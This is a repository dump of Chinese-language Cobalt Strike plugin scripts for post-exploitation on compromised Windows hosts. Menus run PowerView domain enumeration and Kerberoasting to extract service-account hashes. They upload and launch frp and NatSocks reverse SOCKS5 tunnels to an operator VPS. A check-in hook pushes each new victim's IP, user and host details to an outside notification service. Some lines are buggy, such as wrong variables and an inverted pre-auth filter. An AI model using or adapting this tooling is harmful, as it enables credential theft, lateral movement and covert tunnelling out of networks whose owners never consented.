获取一个或多个远程主机上本地组的成员"); 158 | blog2($1, "Get-NetSession 获取指定服务器的会话"); 159 | blog2($1, 
"Get-NetRDPSession 获取指定服务器的远程连接"); 160 | blog2($1, "Get-NetProcess 获取远程主机的进程"); 161 | blog2($1, "Get-UserEvent 获取指定用户的日志"); 162 | blog2($1, "Get-ADObject 获取活动目录的对象"); 163 | blog2($1, "Get-NetGPO 获取域内所有的组策略对象"); 164 | blog2($1, "Get-NetGPOGroup 获取域中设置”受限组”的所有GPO"); 165 | blog2($1, "Find-GPOLocation 获取用户/组,并通过GPO枚举和关联使其具有有效权限的计算机"); 166 | blog2($1, "Find-GPOComputerAdmin 获取计算机并通过GPO枚举确定谁对其具有管理权限"); 167 | blog2($1, "Get-DomainPolicy 获取域默认策略或域控制器策略"); 168 | blog2($1, "Get-DomainSID 返回指定域的SID"); 169 | blog2($1, "Invoke-UserHunter 获取域用户登录的计算机信息及该用户是否有本地管理员权限"); 170 | blog2($1, "Invoke-ProcessHunter 通过查询域内所有的机器进程找到特定用户"); 171 | blog2($1, "Invoke-UserEventHunter 根据用户日志查询某域用户登陆过哪些域机器"); 172 | blog2($1, "Invoke-ShareFinder 在本地域中的主机上查找(非标准)共享"); 173 | blog2($1, "Invoke-FileFinder 在本地域中的主机上查找潜在的敏感文件"); 174 | blog2($1, "Find-LocalAdminAccess 在域上查找当前用户具有本地管理员访问权限的计算机"); 175 | blog2($1, "Find-ManagedSecurityGroups 搜索受管理的活动目录安全组并标识对其具有写访问权限的用户,即这些组拥有添加或删除成员的能力"); 176 | blog2($1, "Get-ExploitableSystem 发现系统可能易受常见攻击"); 177 | blog2($1, "Invoke-EnumerateLocalAdmin 枚举域中所有计算机上本地管理员组的成员"); 178 | } 179 | 180 | 181 | alias powerview-import{ 182 | $bid = $1; 183 | if($2 eq 1){ 184 | $id = 1; 185 | fileexists($id, $bid); 186 | }else if($2 eq 0){ 187 | $id = 0; 188 | fileexists($id, $bid); 189 | }else{ 190 | blog2($1, "powerview-import 1 导入master分支的powerview.ps1"); 191 | blog2($1, "powerview-import 0 导入dev分支的powerview.ps1"); 192 | blog2($1, "导入powerview脚本 (导入分支的时候记得先清空原先导入的)"); 193 | } 194 | } 195 | 196 | 197 | sub fileexists{ 198 | if ($id eq 1){ 199 | $file = "PowerView_master.ps1"; 200 | }else{ 201 | $file = "PowerViewv3.0.ps1"; 202 | } 203 | 204 | if( -exists script_resource($file)){ 205 | btask($bid, "[*] found file:".$file); 206 | bpowershell_import($bid, script_resource($file)); 207 | btask($bid, "[!] load module:".$f." 
Sucess"); 208 | btask($bid, "[*] Test whether the import is successful,get domain SID"); 209 | bpowerpick($bid, "Get-DomainSID"); 210 | } 211 | } 212 | 213 | sub main{ 214 | if ($3['set'] eq '约束委派'){ 215 | if($3['type'] eq 'computer'){ 216 | $command = 'Get-DomainComputer -TrustedToAuth -Domain '.$3['domain']; 217 | }else{ 218 | $command = 'Get-DomainUser -TrustedToAuth -Domain '.$3['domain']; 219 | } 220 | bpowershell_import_clear($bid); 221 | $id = 1; 222 | fileexists($id, $bid); 223 | bpowerpick($bid, $command); 224 | }else{ 225 | bpowershell_import_clear($bid); 226 | $id = 0; 227 | fileexists($id, $bid); 228 | if($3['type'] eq 'computer'){ 229 | $command = 'Get-NetUser -Unconstrained -Domain '.$3['domain']; 230 | }else{ 231 | $command = 'Get-NetComputer -Unconstrained -Domain '.$3['domain']; 232 | } 233 | bpowerpick($bid, $command); 234 | } 235 | } 236 | 237 | sub main2{ 238 | bpowershell_import_clear($bid); 239 | $id = 1; 240 | fileexists($id, $bid); 241 | bpowerpick($bid, $command); 242 | $command = "Get-DomainGPO -Domain ".$3['domain']." 
-Properties Name, DisplayName"; 243 | bpowerpick($bid, $command); 244 | 245 | } 246 | 247 | sub ui{ 248 | $dialog = dialog("info", %(domain => "YAYI.local", bid => $bid), &main); 249 | dialog_description($dialog, "约束委派/非约束委派查询(非约束委派查询时,由于要导入另外分支的powerview将清空导入的ps1脚本)"); 250 | drow_combobox($dialog, "set", "委派类型:", @("约束委派", "非约束委派")); 251 | drow_combobox($dialog, "type", "查询类型:", @("computer", "user")); 252 | drow_text($dialog, "domain", "domain:"); 253 | dbutton_action($dialog, "RUN"); 254 | dialog_show($dialog); 255 | } 256 | 257 | sub ui2{ 258 | $dialog = dialog("info",%(domain => "YAYI.local",bid => $bid), &main2); 259 | dialog_description($dialog, "查询域内GPO名称和GPU objectid"); 260 | drow_text($dialog, "domain", "domain:"); 261 | dbutton_action($dialog, "RUN"); 262 | dialog_show($dialog); 263 | } 264 | 265 | 266 | popup beacon_bottom{ 267 | menu "PowerView"{ 268 | $bid = $1; 269 | item "约束委派用户查询"{ 270 | ui($bid); 271 | } 272 | 273 | item "GPO查询"{ 274 | ui2($bid); 275 | } 276 | 277 | } 278 | } 279 | -------------------------------------------------------------------------------- /powerview常用/2008.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/powerview常用/2008.png -------------------------------------------------------------------------------- /powerview常用/2008_query.cna: -------------------------------------------------------------------------------- 1 | sub moduleimport{ 2 | foreach $bid ($1){ 3 | blog($bid, "导入脚本: $modulename"); 4 | bpowershell_import($bid, script_resource($modulename)); 5 | } 6 | } 7 | 8 | sub getuser{ 9 | bpowershell($bid, "Import-Module .\\AD.dll;Get-ADUser -Identity \"$3['username']\""); 10 | } 11 | 12 | sub groupquery{ 13 | bpowershell($bid, "Import-Module .\\AD.dll;Get-ADGroupMember \'$3['groupname']\' | Select-Object name,objectClass,distinguishedName,SID | fl"); 14 | } 15 | 16 | sub spnuserquery{ 17 | 
bpowershell($bid, "Import-Module .\\AD.dll;Invoke-Kerberoast -Identity \'$3['spnusername']\' | %{\$_.hash}"); 18 | } 19 | 20 | popup beacon_bottom{ 21 | menu "powerview常用查询"{ 22 | item "上传AD模块"{ 23 | bupload($bid, script_resource("AD.dll")); 24 | } 25 | item "导入Powerview"{ 26 | $modulename = "Powerview.ps1"; 27 | moduleimport($1, $modulename); 28 | foreach $bid ($1){ 29 | blog2($bid, "powerview导入测试"); 30 | bpowershell($bid, "Import-Module .\\AD.dll;Get-DomainController"); 31 | } 32 | } 33 | item "查看指定的用户信息"{ 34 | $modulename = "Powerview.ps1"; 35 | moduleimport($1, $modulename); 36 | foreach $bid ($1){ 37 | $dialog = dialog("查看指定用户", %(username => ""), &getuser); 38 | dialog_description($dialog, "powerview查看指定用户的信息"); 39 | drow_text($dialog, "username", "用户: "); 40 | dbutton_action($dialog, "QUERY"); 41 | dialog_show($dialog); 42 | } 43 | } 44 | 45 | item "所有用户最后一个错误的密码尝试"{ 46 | $modulename = "Powerview.ps1"; 47 | moduleimport($1, $modulename); 48 | foreach $bid ($1){ 49 | bpowershell($bid, " 50 | Import-Module .\\AD.dll;get-aduser -filter * -prop lastbadpasswordattempt,badpwdcount | select name,lastbadpasswordattempt,badpwdcount | format-table -auto"); 51 | } 52 | } 53 | 54 | 55 | item "查询某个组的用户"{ 56 | $modulename = "Powerview.ps1"; 57 | moduleimport($1, $modulename); 58 | foreach $bid ($1){ 59 | $dialog = dialog("查看指定组的所有用户", %(groupname => ""), &groupquery); 60 | dialog_description($dialog, "powerview查看指定组的所有用户"); 61 | drow_text($dialog, "groupname", "组名: "); 62 | dbutton_action($dialog, "QUERY"); 63 | dialog_show($dialog); 64 | } 65 | 66 | } 67 | 68 | item "域控机器查询"{ 69 | $modulename = "Powerview.ps1"; 70 | moduleimport($1, $modulename); 71 | foreach $bid ($1){ 72 | bpowershell($bid, "Import-Module .\\AD.dll;Get-ADDomainController -filter * | Select-Object HostName,IPv4Address,OperatingSystem | fl"); 73 | } 74 | } 75 | 76 | item "获取域级别"{ 77 | $modulename = "Powerview.ps1"; 78 | moduleimport($1, $modulename); 79 | foreach $bid ($1){ 80 | bpowershell($bid, 
"Import-Module .\\AD.dll;Get-ADDomain | Select-Object DNSRoot,PDCEmulator,DomainMode"); 81 | } 82 | } 83 | 84 | item "寻找域内所有计算机和计算机对应的DNS"{ 85 | $modulename = "Powerview.ps1"; 86 | moduleimport($1, $modulename); 87 | foreach $bid ($1){ 88 | bpowershell($bid, "Import-Module .\\AD.dll;Get-ADComputer -Filter * -Property Name,IPv4Address | Select-Object DNSHostName,IPv4Address,SID | fl"); 89 | } 90 | } 91 | 92 | item "寻找域内所有用户"{ 93 | $modulename = "Powerview.ps1"; 94 | moduleimport($1, $modulename); 95 | foreach $bid ($1){ 96 | bpowershell($bid, "Import-Module .\\AD.dll;Get-ADUser -Filter * | Select-Object Name,ObjectClass,SID | fl"); 97 | } 98 | } 99 | 100 | item "寻找kerberos服务用户"{ 101 | $modulename = "Powerview.ps1"; 102 | moduleimport($1, $modulename); 103 | foreach $bid ($1){ 104 | bpowershell($bid, "Import-Module .\\AD.dll;Get-ADUser -filter {ServicePrincipalName -like \"*\"} -Property * | Select-Object Name,SID,ServicePrincipalNames | fl"); 105 | } 106 | } 107 | 108 | item "无委派计算机查询"{ 109 | $modulename = "Powerview.ps1"; 110 | moduleimport($1, $modulename); 111 | foreach $bid ($1){ 112 | bpowershell($bid, "Import-Module .\\AD.dll;Get-ADComputer -Filter {TrustedForDelegation -eq \$True} -Properties * | select-object DNSHostName,IPv4Address,KerberosEncryptionType,whenCreated | fl"); 113 | } 114 | } 115 | 116 | item "约束委派用户查询"{ 117 | $modulename = "Powerview.ps1"; 118 | moduleimport($1, $modulename); 119 | foreach $bid ($1){ 120 | bpowershell($bid, "Import-Module .\\AD.dll;Get-ADUser -Filter {TrustedToAuthForDelegation -eq \$True} -Properties * | select-object DistinguishedName,servicePrincipalName,msDS-AllowedToDelegateTo"); 121 | } 122 | } 123 | 124 | item "域用户不要求kerberos验证身份查询"{ 125 | $modulename = "Powerview.ps1"; 126 | moduleimport($1, $modulename); 127 | foreach $bid ($1){ 128 | bpowershell($pid, "Import-Module .\\AD.dll;Get-ADUser -Filter {DoesNotRequirePreAuth -eq \$False} | Select-Object Name,SID | fl"); 129 | } 130 | } 131 | 132 | item "获取指定SPN用户的hash"{ 133 
| $modulename = "Powerview.ps1"; 134 | moduleimport($1, $modulename); 135 | foreach $bid ($1){ 136 | $dialog = dialog("获取指定SPN用户的hash", %(spnusername => ""), &spnuserquery); 137 | dialog_description($dialog, "powerview获取指定SPN用户的hash"); 138 | drow_text($dialog, "spnusername", "用户: "); 139 | dbutton_action($dialog, "QUERY"); 140 | dialog_show($dialog); 141 | } 142 | } 143 | 144 | item "枚举有价值(高权限组)的SPN用户"{ 145 | $modulename = "Powerview.ps1"; 146 | moduleimport($1, $modulename); 147 | foreach $bid ($1){ 148 | bpowershell($bid, "Import-Module .\\AD.dll;Get-NetUser -spn -AdminCount|Select name,whencreated,pwdlastset,lastlogon"); 149 | } 150 | 151 | } 152 | } 153 | } -------------------------------------------------------------------------------- /powerview常用/2012_query.cna: -------------------------------------------------------------------------------- 1 | sub moduleimport{ 2 | foreach $bid ($1){ 3 | blog($bid, "导入脚本: $modulename"); 4 | bpowershell_import($bid, script_resource($modulename)); 5 | } 6 | } 7 | 8 | sub getuser{ 9 | bpowershell($bid, "Get-ADUser -Identity \"$3['username']\""); 10 | } 11 | 12 | sub groupquery{ 13 | bpowershell($bid, "Get-ADGroupMember \'$3['groupname']\' | Select-Object name,objectClass,distinguishedName,SID | fl"); 14 | } 15 | 16 | sub spnuserquery{ 17 | bpowershell($bid, "Invoke-Kerberoast -Identity \'$3['spnusername']\' | %{\$_.hash}"); 18 | } 19 | 20 | popup beacon_bottom{ 21 | menu "powerview常用查询"{ 22 | item "导入Powerview"{ 23 | $modulename = "Powerview.ps1"; 24 | moduleimport($1, $modulename); 25 | foreach $bid ($1){ 26 | blog2($bid, "powerview导入测试"); 27 | bpowershell($bid, "Get-DomainController"); 28 | } 29 | } 30 | item "查看指定的用户信息"{ 31 | $modulename = "Powerview.ps1"; 32 | moduleimport($1, $modulename); 33 | foreach $bid ($1){ 34 | $dialog = dialog("查看指定用户", %(username => ""), &getuser); 35 | dialog_description($dialog, "powerview查看指定用户的信息"); 36 | drow_text($dialog, "username", "用户: "); 37 | dbutton_action($dialog, "QUERY"); 38 | 
dialog_show($dialog); 39 | } 40 | } 41 | 42 | item "所有用户最后一个错误的密码尝试"{ 43 | $modulename = "Powerview.ps1"; 44 | moduleimport($1, $modulename); 45 | foreach $bid ($1){ 46 | bpowershell($bid, " 47 | get-aduser -filter * -prop lastbadpasswordattempt,badpwdcount | select name,lastbadpasswordattempt,badpwdcount | format-table -auto"); 48 | } 49 | } 50 | 51 | 52 | item "查询某个组的用户"{ 53 | $modulename = "Powerview.ps1"; 54 | moduleimport($1, $modulename); 55 | foreach $bid ($1){ 56 | $dialog = dialog("查看指定组的所有用户", %(groupname => ""), &groupquery); 57 | dialog_description($dialog, "powerview查看指定组的所有用户"); 58 | drow_text($dialog, "groupname", "组名: "); 59 | dbutton_action($dialog, "QUERY"); 60 | dialog_show($dialog); 61 | } 62 | 63 | } 64 | 65 | item "域控机器查询"{ 66 | $modulename = "Powerview.ps1"; 67 | moduleimport($1, $modulename); 68 | foreach $bid ($1){ 69 | bpowershell($bid, "Get-ADDomainController -filter * | Select-Object HostName,IPv4Address,OperatingSystem | fl"); 70 | } 71 | } 72 | 73 | item "获取域级别"{ 74 | $modulename = "Powerview.ps1"; 75 | moduleimport($1, $modulename); 76 | foreach $bid ($1){ 77 | bpowershell($bid, "Get-ADDomain | Select-Object DNSRoot,PDCEmulator,DomainMode"); 78 | } 79 | } 80 | 81 | item "寻找域内所有计算机和计算机对应的DNS"{ 82 | $modulename = "Powerview.ps1"; 83 | moduleimport($1, $modulename); 84 | foreach $bid ($1){ 85 | bpowershell($bid, "Get-ADComputer -Filter * -Property Name,IPv4Address | Select-Object DNSHostName,IPv4Address,SID | fl"); 86 | } 87 | } 88 | 89 | item "寻找域内所有用户"{ 90 | $modulename = "Powerview.ps1"; 91 | moduleimport($1, $modulename); 92 | foreach $bid ($1){ 93 | bpowershell($bid, "Get-ADUser -Filter * | Select-Object Name,ObjectClass,SID | fl"); 94 | } 95 | } 96 | 97 | item "寻找kerberos服务用户"{ 98 | $modulename = "Powerview.ps1"; 99 | moduleimport($1, $modulename); 100 | foreach $bid ($1){ 101 | bpowershell($bid, "Get-ADUser -filter {ServicePrincipalName -like \"*\"} -Property * | Select-Object Name,SID,ServicePrincipalNames | fl"); 102 | } 103 | } 
104 | 105 | item "无委派计算机查询"{ 106 | $modulename = "Powerview.ps1"; 107 | moduleimport($1, $modulename); 108 | foreach $bid ($1){ 109 | bpowershell($bid, "Get-ADComputer -Filter {TrustedForDelegation -eq \$True} -Properties * | select-object DNSHostName,IPv4Address,KerberosEncryptionType,whenCreated | fl"); 110 | } 111 | } 112 | 113 | item "约束委派用户查询"{ 114 | $modulename = "Powerview.ps1"; 115 | moduleimport($1, $modulename); 116 | foreach $bid ($1){ 117 | bpowershell($bid, "Get-ADUser -Filter {TrustedToAuthForDelegation -eq \$True} -Properties * | select-object DistinguishedName,servicePrincipalName,msDS-AllowedToDelegateTo"); 118 | } 119 | } 120 | 121 | item "域用户不要求kerberos验证身份查询"{ 122 | $modulename = "Powerview.ps1"; 123 | moduleimport($1, $modulename); 124 | foreach $bid ($1){ 125 | bpowershell($pid, "Get-ADUser -Filter {DoesNotRequirePreAuth -eq \$False} | Select-Object Name,SID | fl"); 126 | } 127 | } 128 | 129 | item "获取指定SPN用户的hash"{ 130 | $modulename = "Powerview.ps1"; 131 | moduleimport($1, $modulename); 132 | foreach $bid ($1){ 133 | $dialog = dialog("获取指定SPN用户的hash", %(spnusername => ""), &spnuserquery); 134 | dialog_description($dialog, "powerview获取指定SPN用户的hash"); 135 | drow_text($dialog, "spnusername", "用户: "); 136 | dbutton_action($dialog, "QUERY"); 137 | dialog_show($dialog); 138 | } 139 | } 140 | } 141 | } -------------------------------------------------------------------------------- /powerview常用/AD.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/powerview常用/AD.dll -------------------------------------------------------------------------------- /powerview常用/README.md: -------------------------------------------------------------------------------- 1 | ## powerview查询 ## 2 | ![](one.jpg) 3 | 4 | 2008无AD模块的需要先点击上传AD模块,然后在点击对应的功能 -> 2008_query.cna 5 | ![](2008.png) 6 | 7 | ## 更新记录 ## 8 | 2021/2/5 
修复了2008等需要依赖`Microsoft.ActiveDirectory.Management.dll`通常导入powerview.ps1缺少的依赖 9 | 2021/2/5 新增功能`枚举在Domain Admins组等之类高权限组的用户` 10 | -------------------------------------------------------------------------------- /powerview常用/one.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/powerview常用/one.jpg -------------------------------------------------------------------------------- /上线提醒/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/上线提醒/1.png -------------------------------------------------------------------------------- /上线提醒/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/上线提醒/2.png -------------------------------------------------------------------------------- /上线提醒/load.cna: -------------------------------------------------------------------------------- 1 | on beacon_initial{ 2 | $host = beacon_info($1, "external"); 3 | $internal = beacon_info($1, "internal"); 4 | $listener = beacon_info($1, "listener"); 5 | $user = beacon_info($1, "user"); 6 | $computer = beacon_info($1, "computer"); 7 | $process = beacon_info($1, "process"); 8 | $pid = beacon_info($1, "pid"); 9 | $arch = beacon_info($1, "arch"); 10 | $command = "python " . script_resource("plus.py") . 
" $host $internal $listener $user $computer $process $pid $arch"; 11 | exec($command); 12 | #println("$content"); 13 | } -------------------------------------------------------------------------------- /上线提醒/plus.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import json 3 | import sys 4 | from functools import wraps 5 | 6 | token="" 7 | headers={"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"} 8 | topic="utf8" 9 | 10 | def log(func): 11 | @wraps(func) 12 | def wrapper(*args,**kwargs): 13 | try: 14 | ret=func(*args,**kwargs) 15 | except Exception as error: 16 | ret="" 17 | print("[Error] filename:{} line:{} Error:{}".format(error.__traceback__.tb_frame.f_globals["__file__"],error.__traceback__.tb_lineno,error)) 18 | return ret 19 | return wrapper 20 | 21 | @log 22 | def send(title,content): 23 | url="http://www.pushplus.plus/send/{}".format(token) 24 | headers["Content-Type"]="application/json" 25 | data={"title":title,"content":content,"topic":topic} 26 | body=json.dumps(data) 27 | rqt=requests.post(url=url,headers=headers,data=body,timeout=3,verify=False) 28 | print(rqt.json()) 29 | 30 | if __name__ == '__main__': 31 | content=["teamserver","ip","listener","user","computer","process","pid","arch"] 32 | text="

" 33 | for c in range(1,len(sys.argv)): 34 | text+="{}:{}
".format(content[c-1],sys.argv[c]) 35 | text+="

" 36 | send("CS上线提醒",text) -------------------------------------------------------------------------------- /上线提醒/readme.md: -------------------------------------------------------------------------------- 1 | 1.登录 http://www.pushplus.plus/ 2 | 2.创建群组 (wx扫码加入群组) 3 | 3.修改plus.py里的token和topic (topic为你设置的群组编码) 4 | 4.cs加载该插件 or `nohup sudo ./agscript load.cna 2>&1 &` 5 | 参考链接:https://xz.aliyun.com/t/10698 6 | 7 | ![](1.png) 8 | ![](2.png) 9 | -------------------------------------------------------------------------------- /代理/NatSocks.x64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/代理/NatSocks.x64.exe -------------------------------------------------------------------------------- /代理/NatSocks.x86.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/代理/NatSocks.x86.exe -------------------------------------------------------------------------------- /代理/README.md: -------------------------------------------------------------------------------- 1 | ## 代理插件 ## 2 | 功能: 3 | * 集合了frp的socks5 4 | * 集合了natsocks 5 | * 支持多beacon 6 | 7 | ![](img/frp.png) 8 | 9 | ![](img/frp2.png) 10 | 11 | ![](img/natsocks.png) 12 | 13 | ![](img/natsocks2.png) -------------------------------------------------------------------------------- /代理/default.cna: -------------------------------------------------------------------------------- 1 | sub frpsocks{ 2 | if("README" eq $2){ 3 | show_message("FrpSocks5帮助\ntips:如果你的VPS上已经监听好了FRP则直接填写对应的配置即可\nserver_addr:你的VPS地址\nserver_port:VPS上FPR对应的监听端口\ntoken:FRP的token验证\nsocks5_Listenport:VPS SOCKS5成功后监听的端口"); 4 | }else{ 5 | foreach $id ($bid){ 6 | btask($id, "server_addr:$3['addr'] server_port:$3['port'] token:$3['token'] socks5Listenport:$3['listenport']"); 7 | btask($id, "Create frps.ini and 
frpc.ini"); 8 | btask($id, "VPS(frps):nohup ./frps -c frps.ini &"); 9 | btask($id, "Client:frpc.exe -c frpc.ini"); 10 | } 11 | #生成frps.ini和frpc.ini 12 | $serverdata = "[common] 13 | bind_port = $3['port'] 14 | token = $3['token']"; 15 | 16 | $clientdata = "[common] 17 | server_addr = $3['addr'] 18 | server_port = $3['port'] 19 | token = $3['token'] 20 | 21 | [socks5] 22 | type = tcp 23 | remote_port = $3['listenport'] 24 | plugin = socks5 25 | use_encryption = true 26 | use_compression = true"; 27 | 28 | #配置文件保存路径 29 | $serverpath = script_resource("frps.ini"); 30 | $clientpath = script_resource("frpc.ini"); 31 | $f = openf(">$serverpath"); 32 | writeb($f, $serverdata); 33 | closef($f); 34 | 35 | $f = openf(">$clientpath"); 36 | writeb($f, $clientdata); 37 | closef($f); 38 | 39 | #上传frpc.exe和frpc.ini到目标 40 | foreach $id ($bid){ 41 | bupload($id, script_resource("frpc.exe")); 42 | bupload($id, script_resource("frpc.ini")); 43 | btask($id, "frpc.exe -c frpc.ini"); 44 | bshell($id, "frpc.exe -c frpc.ini"); 45 | } 46 | } 47 | } 48 | 49 | sub natsocks { 50 | if("README" eq $2){ 51 | show_message("NatSocks帮助\nmode:resocks为反弹socsk5\nslave为反弹指定端口\n端口映射\n将内网机器(127.0.0.1)的3389端口转发到公网机器(8.8.8.8)的2017端口:\n公网机器(8.8.8.8):NatSocks -listen 1997 2017\nSocks5\n内网机器(127.0.0.1):NatSocks -slave 127.0.0.1:3389 8.8.8.8:1997\n在内网机器(127.0.0.1)的1080端口建立socks服务并转发到公网机器(8.8.8.8)的2017端口:\n公网机器(8.8.8.8):NatSocks -listen 1997 2017\n内网机器(127.0.0.1):NatSocks -resocks 127.0.0.1:1080 8.8.8.8:1997") 52 | }else{ 53 | if($3['arch'] eq "x64"){ 54 | $name = "NatSocks.x64.exe"; 55 | $path = script_resource("NatSocks.x64.exe"); 56 | }else{ 57 | $name = "NatSocks.x86.exe"; 58 | $path = script_resource("NatSocks.x86.exe"); 59 | } 60 | $command = "$name -$3['mode'] $3['Intranet']\:$3['Intranetport'] $3['remoteaddr']\:$3['remoteport']"; 61 | foreach $id ($bid){ 62 | bupload($id, $path); 63 | btask($id, $command); 64 | bshell($id, $command); 65 | } 66 | 67 | } 68 | } 69 | 70 | sub frpwindow { 71 | $dialog = 
dialog("frp socks5 config", %(addr => "0.0.0.0", port => "7000", token => "RaidenMei", listenport => "8088", bid => $bid), &frpsocks); 72 | dialog_description($dialog, "frp socks5 配置文件生成上传"); 73 | drow_text($dialog, "addr", "server_addr: "); 74 | drow_text($dialog, "port", "server_port: "); 75 | drow_text($dialog, "token", "token: "); 76 | drow_text($dialog, "listenport", "socks5_Listenport: "); 77 | dbutton_action($dialog, "Create"); 78 | dbutton_action($dialog, "README"); 79 | dialog_show($dialog); 80 | } 81 | 82 | sub NatSockswindow { 83 | $dialog = dialog("NatSocks socks5 config", %(Intranet => "127.0.0.1", Intranetport => "1080", remoteaddr => "1.1.1.1", remoteport => "1997", arch => "x64", mode => "resocks"), &natsocks); 84 | dialog_description($dialog, "NatSocks Socks5反弹,Arch:x64/x86\nmode:resocks为反弹socsk5\nslave为反弹指定端口"); 85 | drow_text($dialog, "Intranet", "Intranet: "); 86 | drow_text($dialog, "Intranetport", "Intranetport: "); 87 | drow_text($dialog, "remoteaddr", "VPSAddr: "); 88 | drow_text($dialog, "remoteport", "VPSport: "); 89 | drow_text($dialog, "mode", "mode: "); 90 | drow_text ($dialog, "arch", "Arch: "); 91 | dbutton_action($dialog, "Go"); 92 | dbutton_action($dialog, "README"); 93 | dialog_show($dialog); 94 | } 95 | 96 | popup beacon_bottom{ 97 | $bid = $1; 98 | menu "代理"{ 99 | item "frp"{ 100 | frpwindow($bid); 101 | } 102 | 103 | item "NatSocks"{ 104 | NatSockswindow($bid); 105 | } 106 | } 107 | } 108 | -------------------------------------------------------------------------------- /代理/frpc.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/代理/frpc.exe -------------------------------------------------------------------------------- /代理/frpc.ini: -------------------------------------------------------------------------------- 1 | [common] 2 | server_addr = 0.0.0.0 3 | server_port = 7000 4 | token = RaidenMei 5 | 6 | 
[socks5] 7 | type = tcp 8 | remote_port = 8088 9 | plugin = socks5 10 | use_encryption = true 11 | use_compression = true -------------------------------------------------------------------------------- /代理/frps.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/代理/frps.exe -------------------------------------------------------------------------------- /代理/frps.ini: -------------------------------------------------------------------------------- 1 | [common] 2 | bind_port = 7000 3 | token = RaidenMei -------------------------------------------------------------------------------- /代理/img/frp.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/代理/img/frp.png -------------------------------------------------------------------------------- /代理/img/frp2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/代理/img/frp2.png -------------------------------------------------------------------------------- /代理/img/natsocks.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/代理/img/natsocks.png -------------------------------------------------------------------------------- /代理/img/natsocks2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/代理/img/natsocks2.png -------------------------------------------------------------------------------- /取证/README.md: -------------------------------------------------------------------------------- 1 | windows取证 2 
| + 最近使用痕迹查询 3 | 4 | ## 最近使用痕迹查询 ## 5 | ![](img/recentquery.png) 6 | -------------------------------------------------------------------------------- /取证/img/recentquery.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/取证/img/recentquery.png -------------------------------------------------------------------------------- /取证/openfilehistory.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/取证/openfilehistory.exe -------------------------------------------------------------------------------- /取证/qz.cna: -------------------------------------------------------------------------------- 1 | sub recentqueryfunc{ 2 | $path = script_resource("openfilehistory.exe"); 3 | bupload($3['bid'], $path); 4 | bshell($3['bid'], "openfilehistory.exe $3['username']"); 5 | } 6 | 7 | 8 | sub recentquery{ 9 | $dialog = dialog("最近使用痕迹查询", %(username => "Administrator", bid => $id), &recentqueryfunc); 10 | dialog_description($dialog, "要查询的用户名输入"); 11 | drow_text($dialog, "username", "USERNAME:"); 12 | dbutton_action($dialog, "run"); 13 | dialog_show($dialog); 14 | } 15 | 16 | popup beacon_bottom { 17 | menu "windows取证"{ 18 | $bid = $1; 19 | item "最近使用痕迹"{ 20 | foreach $id ($bid){ 21 | recentquery($id) 22 | } 23 | } 24 | } 25 | } -------------------------------------------------------------------------------- /杀毒检测/README.md: -------------------------------------------------------------------------------- 1 | ## 进程检测 ## 2 | pscheck 3 | 需要检测的进程写在list.txt,格式如下 4 | ``` 5 | => 6 | ``` 7 | 8 | pscheck列出匹配的进程 9 | ![](process_check.png) 10 | 11 | xiaobaicheck 12 | 由刨洞群的小白师傅在线进程检测提供,请求http://42.193.251.15/tasklist.php 获取返回结果 13 | ![](xiaobaicheck.png) 14 | -------------------------------------------------------------------------------- 
/杀毒检测/av_query.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/杀毒检测/av_query.png -------------------------------------------------------------------------------- /杀毒检测/check.cnf: -------------------------------------------------------------------------------- 1 | popup beacon_bottom{ 2 | item "杀毒查询"{ 3 | foreach $id ($1){ 4 | bpowershell_import!($id, script_resource("check.ps1")); 5 | bpowerpick!($id, "avquery"); 6 | } 7 | } 8 | } 9 | 10 | alias avquery{ 11 | bpowershell_import!($1, script_resource("check.ps1")); 12 | bpowerpick!($1, "avquery"); 13 | } -------------------------------------------------------------------------------- /杀毒检测/check.ps1: -------------------------------------------------------------------------------- 1 | function avquery{ 2 | 